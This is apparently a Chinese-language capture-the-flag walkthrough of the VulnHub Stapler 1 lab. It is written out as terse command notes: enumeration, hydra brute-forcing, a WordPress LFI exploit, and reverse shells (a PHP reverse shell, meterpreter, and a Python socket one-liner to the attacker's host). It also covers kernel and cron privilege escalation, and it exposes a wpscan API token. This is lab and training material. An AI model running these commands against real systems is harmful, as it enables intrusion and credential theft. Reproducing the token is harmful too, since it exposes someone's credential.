靶机地址:https://www.vulnhub.com/entry/stapler-1,150/
nmap 192.168.75.0/24 -sP ip 192.168.75.19
nmap 192.168.75.19 -sS -sV -A -T4 20 21 22 53 80 123 137 138 139 666 3306 12380御剑端口扫描 dirb
dirb http://192.168.75.19
输入路径 得到两文件 无用FTP
有前面nmap得到 可以匿名登陆 ftp 192.168.75.19 得到 三个人名 Harry Elly JohnSSH
ssh John@192.168.75.19 查看有无提示 得到一个人名 BarrySamba
SMB 是使用 SMB 或端口 139 和 445 的文件或数据共享协议,您可以将本地计算机中的文件或数据共享到计算机服务器, 当您使用 smbclient 工具登录时,您还可以访问其他用户文件或数据。 类似于端口 21 FTP一样与文件服务器通信,但这是一个高级版本。
smbclient命令属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源。 Enum4linux 是一个从 Windows 和 Samba 系统枚举信息的工具smbclient
https://stc214.github.io/posts/2021%E5%B9%B42%E6%9C%886%E6%97%A513/ smbclient -L 192.168.75.19 -N
smbclient //192.168.75.19/kathy kathy_stuff 目录下得到 todo-list.txt 得到2个人名 Initech Kathy
smbclient //192.168.75.19/tmpEnum4linux
https://hackfun.org/2016/10/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Benum4linux/ enum4linux -a 192.168.75.19 得到30个人名cut
https://www.cnblogs.com/dong008259/archive/2011/12/09/2282679.html cut是一个选取命令,就是将一段数据经过分析,取出我们想要的。 将前面的30个人名保存下来 cat users | cut -d '' -f2 | cut -d ' ' -f1 > users.txt 将前面的7个人名添加到users.txt666
nc 192.168.75.19 666 > file666 file file666 unzip file666 exiftool message2.jpg strings message2.jpg 得到一个cookiemysql 3306
mysql -h 192.168.75.19 -p 3306 可以远程登录12380 nikto
https://www.cnblogs.com/H4ck3R-XiX/p/12630031.html nikto -h http://192.168.75.19:12380 发现三个目录和robots.txt! 还提示SSL Info,说明是ssl访问的!不然http访问都会重定向回来! /admin112233/ /blogblog/ /phpmyadmin/:渗透 ftp 爆破
hydra -L users.txt -P users.txt ftp://192.168.75.19 ftp 192.168.75.19 SHayslett SHayslett 里面没什么信息ssh 爆破
hydra -L users.txt -P users.txt ssh://192.168.75.1912380
还提示SSL /admin112233/ /blogblog/ /phpmyadmin/ robots.txt 一个个查看awvs
/blogblog/ 扫描发现这是WordPress 4.2.2 多个漏洞
WordPress Plugin Adavnced Video embed Local File Inclusion (1.0)
WordPress 4.2.x Arbitrary File Deletion Vulnerability (4.2 - 4.2.20)wpscan
wpscan --url https://192.168.75.19:12380/blogblog/ --disable-tls-checks --api-token h5OtnwPM6ekd5w5vZvjgeLUbPscgcOpe5SFt2wJTd54 --disable-tls-checks ---因为会受到SSL对等证书/SSH错误临时用法!
wpscan --url https://192.168.75.19:12380/blogblog/ --disable-tls-checks --api-token h5OtnwPM6ekd5w5vZvjgeLUbPscgcOpe5SFt2wJTd54 可以自己去官网注册 这样会有漏洞利用信息 每天有免费api token次数漏洞利用
blogblog/wp-content/ 存在可以用漏洞 https://www.exploit-db.com/exploits/39646
kali 本地搜索 searchsploit 39646 locate php/webapps/39646.py cp /usr/share/exploitdb/exploits/php/webapps/39646.py . vim 修改信息 https://192.168.75.19:12380/blogblog/ import ssl ssl._create_default_https_context = ssl._create_unverified_context 参考: https://stackoverflow.com/questions/27835619/urllib-and-ssl-certificate-verify-failed-error
python 39646.py https://192.168.75.19:12380/blogblog/wp-content/uploads/ 得到照片
wget https://192.168.75.19:12380/blogblog/wp-content/uploads/1171105380.jpeg --no-check-certificate --no-check-certificate ---下载ssl
file 1171105380.jpeg cat 1171105380.jpeg 得到 mysql账号密码 root plbkacmysql
mysql -uroot -pplbkac -h 192.168.75.19 show databases; use wordpress show tables; desc wp_users; select user_login,user_pass from wp_users; 将账号密码保存到 mysqlupjohn
awk -F'|' '{print $3}' mysqlup > mysqlup.txt
john --wordlist=/usr/share/wordlists/rockyou.txt mysqlup.txt
john incorrect 访问 https://192.168.75.19:12380/blogblog/wp-admin登录 https://192.168.75.19:12380/blogblog/wp-admin/plugins.php 存在上传文件提权 webshell php-reverse-shell.php
上传 php文件 cp /usr/share/webshells/php/php-reverse-shell.php shell.php vim shell.php Plugins-》 add New -》upload Plugin 上传 nc -lvp 7000weevely
weevely generate weevely weevely.php weevely https://192.168.75.19:12380/blogblog/wp-content/uploads/weevely.php weevelymsf
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.75.1 LPORT=4455 -f raw > msf.php
msfconsole use exploit/multi/handler set payload php/meterpreter_reverse_tcp set LHOST 192.168.75.1 set LPORT 4455 runmysql into
mysql -uroot -pplbkac -h 192.168.75.19
select "" into outfile "/var/www/https/blogblog/wp-content/uploads/mysql.php";
https://192.168.75.19:12380/blogblog/wp-content/uploads/mysql.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.75.1",6688));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
exp
linpeas.sh
linpeas.sh信息枚举 python -m SimpleHTTPServer 8081 wget http://192.168.75.1:8081/linpeas.sh chmod +x linpeas.sh ./linpeas.sh内核信息
Linux version 4.4.0-21-genericsudo提权
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)mysql
mysql
[+] Searching Wordpress wp-config.php files /var/www/https/blogblog/wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'plbkac');
define('DB_HOST', 'localhost');
ssh
PermitEmptyPasswords yespath 可写入
[+] .sh files in [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path You can write script: /usr/local/sbin/cron-logrotate.sh内核提权
Linux version 4.4.0-21-generic ./les.sh 发现很多提权方法dirtycow
https://www.exploit-db.com/exploits/40847 漏洞文章 searchsploit 40847 locate linux/local/40847.cpp cp /usr/share/exploitdb/exploits/linux/local/40847.cpp . wget http://192.168.75.1:8081/40847.cpp g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil ./dcow su root dirtyCowFun id39772
https://www.exploit-db.com/exploits/39772 漏洞文章 proxychains wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip wget http://192.168.75.1:8081/39772.zip unzip 39772.zip cd 39772 tar -xvf exploit.tar cd ebpf_mapfd_doubleput_exploit chmod +x compile.sh ./compile.sh ls ./doubleputCVE-2021-4034
proxychains git clone https://github.com/arthepsy/CVE-2021-4034.git ubuntu 16 基本通杀 wget http://192.168.75.1:8081/CVE-2021-4034/cve-2021-4034-poc.c gcc cve-2021-4034-poc.c -o exp chmod +x exp ./expssh sudo
cd /home gerp -rn "ssh" 信息泄露得到账号密码 JKanode/.bash_history:6:sshpass -p thisimypassword ssh JKanode@localhost JKanode/.bash_history:8:sshpass -p JZQuyIN5 peter@localhost
PermitEmptyPasswords yes 更换shell ssh peter@192.168.75.19 JZQuyIN5 ssh peter@192.168.75.19 -t '/bin/bash' JZQuyIN5
ssh peter@192.168.75.19 -t '/bin/bash' JZQuyIN5 sudo -l JZQuyIN5 sudo su id可写入sh文件
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path You can write script: /usr/local/sbin/cron-logrotate.sh cd / grep -rn "/usr/local/sbin/cron-logrotate.sh" cat /usr/local/sbin/cron-logrotate.sh cat etc/cron.d/logrotate echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit" >> /usr/local/sbin/cron-logrotate.sh cat /usr/local/sbin/cron-logrotate.sh /tmp/exploit -p idflag
cd /root ls cat flag.txt
